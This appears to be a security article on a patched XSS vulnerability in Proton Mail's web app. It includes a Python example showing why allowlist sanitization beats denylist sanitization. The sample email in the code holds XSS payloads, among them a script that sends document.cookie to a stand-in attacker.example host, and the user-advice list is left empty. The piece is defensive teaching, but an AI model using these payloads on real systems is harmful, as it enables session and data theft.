The Sonar Research team identified the vulnerability during a routine audit of Proton's open-source repositories. The issue stemmed from how the web application handled user-controlled HTML. Senders need the ability to style their messages, but if certain tags are not properly sanitized before the message is rendered, malicious markup can execute script in the reader's browser.

How the Exploit Worked

In most scenarios, the attack only worked if the victim viewed both emails and clicked a specific link in the second one.

If successful, the script would run in the victim's session, allowing the attacker to "see" what the user sees, effectively stealing the decrypted content of their inbox.

Proton's Response and Resolution

After researchers disclosed the bug in June 2022, Proton developed and deployed a fix by early July 2022.

Analysis of spam and virus filter logs showed no evidence of the exploit being used in the wild by malicious actors.

This incident serves as a reminder that no system is 100% secure, but active collaboration with the security community, often incentivized by Proton's Bug Bounty Program, is essential for maintaining privacy. To stay secure, users should:

Proton Mail's responsible vulnerability disclosure policy
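The sanitization failure described under "How the Exploit Worked" comes down to the difference between stripping tags you know are bad and keeping only tags you know are safe. The block below is an added illustration written for this article; it is not Proton's code and not the Sonar proof of concept. Both sanitizers, the helper that scans for leftover script vectors, and the sample email body are constructed here, and the payloads it uses (an inline script, an event-handler attribute, a javascript: link) are generic examples rather than the specific tags that affected Proton Mail.

```python
"""Denylist versus allowlist sanitization of an untrusted HTML email body.

Added illustration for this article, not Proton's code: both sanitizers,
the check helper and the sample message are constructed here.
"""
import html
import re
from html.parser import HTMLParser

# Untrusted email body, constructed for this example. It mixes benign
# formatting with several generic ways of smuggling script into a page.
SAMPLE_EMAIL = (
    '<p style="color:red">Quarterly <b>report</b> attached.</p>'
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<img src="x" onerror="alert(document.domain)">'
    '<svg onload="alert(1)"><a xlink:href="javascript:alert(1)">link</a></svg>'
    '<a href="javascript:alert(1)">click</a>'
)

# Weak approach: remove the tags we have heard of, pass everything else through.
DENYLIST = re.compile(r"</?(script|iframe|object|embed)[^>]*>", re.I)


def denylist_sanitize(body: str) -> str:
    """Strips only the listed tags; event handlers, javascript: URLs and
    any element not on the list survive untouched."""
    return DENYLIST.sub("", body)


# Hardened approach: keep only listed elements and attributes, drop the rest.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "br", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}            # no style, no on* handlers anywhere
DROP_WITH_CONTENT = {"script", "style"}    # their text must not leak through
VOID_TAGS = {"br"}                         # emitted without a closing tag
SAFE_URL = re.compile(r"^(https?:|mailto:)", re.I)


class AllowlistSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.out: list[str] = []
        self.skip_depth = 0   # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS or self.skip_depth:
            return                      # unknown element: drop the tag, keep its text
        rendered = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                # drops every on* handler and xlink:href
            if name == "href" and (value is None or not SAFE_URL.match(value)):
                continue                # rejects javascript:, data:, vbscript: ...
            rendered.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(rendered)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS and not self.skip_depth:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))  # re-escape text nodes


def allowlist_sanitize(body: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)


def has_active_content(body: str) -> bool:
    """Rough check used to compare the two results: any on* handler or
    javascript: URL left in the output is a script execution vector."""
    return bool(re.search(r"\son\w+\s*=|javascript:", body, re.I))


if __name__ == "__main__":
    print("denylist :", denylist_sanitize(SAMPLE_EMAIL))
    print("allowlist:", allowlist_sanitize(SAMPLE_EMAIL))
```

Running it shows the denylist version removing only the `<script>` tags while leaving the script body as visible text and passing `onerror`, `onload` and the `javascript:` link straight through to the reader's browser; the allowlist version reduces the same message to `<p>Quarterly <b>report</b> attached.</p><a>link</a><a>click</a>`. A production mail client should rely on a maintained sanitizer library rather than a hand-written parser like this one, but the allowlist principle it demonstrates is the one that matters.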